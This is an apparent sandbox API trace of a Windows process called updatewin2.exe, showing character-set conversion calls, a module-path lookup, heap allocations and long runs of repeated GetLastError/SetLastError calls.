¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒪쥩㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0043.907] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒪쥩㞅AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0043.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8bÏ»É\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.908] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒪쥩㞅AĀ") returned 256 [0043.908] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒪쥩㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0043.908] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒪쥩㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0043.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8bÏ»É\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0043.908] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin2.exe")) returned 0x5f [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] GetLastError () returned 0x0 [0043.908] SetLastError (dwErrCode=0x0) [0043.908] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.909] GetLastError () returned 0x0 [0043.909] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.910] SetLastError (dwErrCode=0x0) [0043.910] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.911] GetLastError () returned 0x0 [0043.911] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.912] GetLastError () returned 0x0 [0043.912] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.913] GetLastError () returned 0x0 [0043.913] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.914] GetLastError () returned 0x0 [0043.914] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x0, Size=0x68) returned 0x1eb1990 [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.915] GetLastError () returned 0x0 [0043.915] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.916] SetLastError (dwErrCode=0x0) [0043.916] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.917] SetLastError (dwErrCode=0x0) [0043.917] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.918] SetLastError (dwErrCode=0x0) [0043.918] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.919] SetLastError (dwErrCode=0x0) [0043.919] GetLastError () returned 0x0 [0043.920] SetLastError (dwErrCode=0x0) [0043.920] GetLastError () returned 0x0 [0043.920] SetLastError (dwErrCode=0x0) [0043.920] GetLastError () returned 0x0 [0043.920] SetLastError (dwErrCode=0x0) [0043.920] GetLastError () returned 0x0 [0043.924] SetLastError (dwErrCode=0x0) [0043.924] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.925] SetLastError (dwErrCode=0x0) [0043.925] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.926] SetLastError (dwErrCode=0x0) [0043.926] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] GetLastError () returned 0x0 [0043.927] SetLastError (dwErrCode=0x0) [0043.927] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x98) returned 0x1eb1a00 [0043.927] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x1f) returned 0x1eb1aa0 [0043.927] RtlAllocateHeap (HeapHandle=0x1eb0000, Flags=0x8, Size=0x36) returned 0x1eb1ac8 